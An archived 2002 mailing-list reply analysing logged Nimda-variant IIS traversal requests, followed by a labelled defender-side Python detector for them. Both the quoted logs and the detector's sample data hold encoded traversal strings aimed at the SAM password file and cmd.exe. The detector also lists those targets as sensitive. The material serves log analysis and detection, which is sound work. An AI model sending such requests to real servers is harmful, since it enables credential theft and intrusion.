Re: [logs] nimda web server logs

From: Sweth Chandramouli (loganalysisat_private)
Date: Tue Jun 11 2002 - 13:53:03 PDT


On Tue, Jun 11, 2002 at 08:03:12PM +0000, Tina Bird wrote:
> Here's what I'm seeing -- anyone have any information on this variant?
	Haven't seen it, myself, but what I see here worries me:

> Jun 10 12:53:39.675 <information deleted> op=GET arg=http://Target
> IP/a.asp/..%c1%1c../..%c1%1c../winnt/repair/sam result="404 Object Not
> Found"
> 
> Jun 10 12:53:43.578 <information deleted> op=GET arg=http://Target
> IP/a.asp/..%c1%9c../..%c1%9c../winnt/repair/sam result="404 Object Not
> Found"
	These seem pretty straightforward--attempts to get the
backup copy of the SAM file (the Windows equiv of /etc/shadow).

> Jun 10 12:53:37.845 <information deleted> op=GET arg=http://Target
> IP/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:
> \\*.cif/s/b result="500 Server Error"
	This is the one that scares me; it's attempting to run a
recursive directory search on your C drive to find your Internet
Explorer component information file--the file that, for example, Windows
Update uses to determine what patches you have installed.  Presumably, if
that request succeeded, it would then download the CIF to find out what
version of IE you have, etc., and try only those exploits of relevance.
It looks like the script kiddies are getting smarter...

	-- Sweth.

-- 
Sweth Chandramouli      Idiopathic Systems Consulting
svcat_private      http://www.idiopathic.net/
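A defender-side detector for the three request patterns quoted in this thread, added here as an example; it is not part of the original post or the list archive. It normalizes the request path the way the targeted server would have (repeated percent-decoding so that `%255c` becomes `%5c` and then a backslash, and the overlong UTF-8 byte pairs `%c1%1c` / `%c1%9c` treated as a path separator), then checks whether the path climbs out of the web root and whether it ends in one of the sensitive targets the log shows. The sample log lines are constructed from the quoted ones, joined onto single lines; the `op=... arg=... result="..."` layout and the `TargetIP` host name are assumptions, as is the `%c0%af` entry, the well-known overlong encoding of `/` that is not on this page.

```python
import re
from urllib.parse import unquote_to_bytes, urlsplit

# Constructed sample lines, modelled on the format quoted in the thread
# (the archive wraps them; here each request is on one line).
SAMPLE_LOGS = [
    'Jun 10 12:53:39.675 <information deleted> op=GET arg=http://TargetIP/a.asp/..%c1%1c../..%c1%1c../winnt/repair/sam result="404 Object Not Found"',
    'Jun 10 12:53:43.578 <information deleted> op=GET arg=http://TargetIP/a.asp/..%c1%9c../..%c1%9c../winnt/repair/sam result="404 Object Not Found"',
    'Jun 10 12:53:37.845 <information deleted> op=GET arg=http://TargetIP/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\\*.cif/s/b result="500 Server Error"',
    'Jun 10 12:54:01.000 <information deleted> op=GET arg=http://TargetIP/index.html result="200 OK"',
]

# Assumed log layout: the fields we need are op=, arg= and result="...".
LINE_RE = re.compile(r'op=(?P<op>\S+)\s+arg=(?P<arg>\S+)\s+result="(?P<result>[^"]*)"')

# Byte pairs that the vulnerable IIS decoder treated as a path separator.
# %c1%1c and %c1%9c are the two forms quoted in the thread; %c0%af is the
# well-known overlong encoding of "/" (not on the page, included as an assumption).
OVERLONG_SEPARATORS = (b"\xc1\x1c", b"\xc1\x9c", b"\xc0\xaf")

# Paths whose presence at the end of a request is worth flagging on its own.
SENSITIVE_TARGETS = ("/winnt/repair/sam", "/system32/cmd.exe")


def normalize_path(raw: str, max_rounds: int = 3) -> str:
    """Decode the path the way the target would, then fold separators to '/'.

    Percent-decoding is repeated until the bytes stop changing, so a
    double-encoded %255c collapses to %5c and then to a backslash. Overlong
    UTF-8 separator pairs are mapped to '/', and backslashes are folded to '/'
    so later checks only have one separator to reason about.
    """
    data = raw.encode("utf-8")
    for _ in range(max_rounds):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
    for seq in OVERLONG_SEPARATORS:
        data = data.replace(seq, b"/")
    data = data.replace(b"\\", b"/")
    # latin-1 never fails, so any leftover odd bytes survive for the report.
    return data.decode("latin-1")


def escapes_root(path: str) -> bool:
    """True if '..' segments ever take the path above the web root."""
    depth = 0
    for seg in path.split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ("", "."):
            depth += 1
    return False


def analyze_line(line: str):
    """Return a finding dict for a suspicious request, or None for a clean one."""
    m = LINE_RE.search(line)
    if not m:
        return None
    arg = m.group("arg")
    parts = urlsplit(arg)  # keep the query (the cmd.exe arguments) out of the path
    path = normalize_path(parts.path)
    reasons = []
    if escapes_root(path):
        reasons.append("traversal escapes web root")
    if "%25" in arg.lower():
        reasons.append("double percent-encoding")
    if any(seq in unquote_to_bytes(parts.path) for seq in OVERLONG_SEPARATORS):
        reasons.append("overlong UTF-8 separator")
    lowered = path.lower()
    for target in SENSITIVE_TARGETS:
        if lowered.endswith(target):
            reasons.append(f"sensitive target {target}")
    if not reasons:
        return None
    return {
        "op": m.group("op"),
        "normalized_path": path,
        "query": parts.query,
        "result": m.group("result"),
        "reasons": reasons,
    }


def scan(lines):
    """Run analyze_line over a log and return only the findings."""
    return [f for f in (analyze_line(l) for l in lines) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOGS):
        print(finding["normalized_path"], "->", ", ".join(finding["reasons"]))
```

The normalized path is what you want in an alert, not the raw request: a `404` or `500` on the decoded `/winnt/repair/sam` or `/winnt/system32/cmd.exe` tells a responder at a glance what was being reached for, and the `reasons` list separates "this encoding is abnormal" from "this target is sensitive", which is useful when tuning thresholds for a noisy worm like Nimda.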
    



    This archive was generated by hypermail 2b30 : Tue Jun 11 2002 - 16:45:44 PDT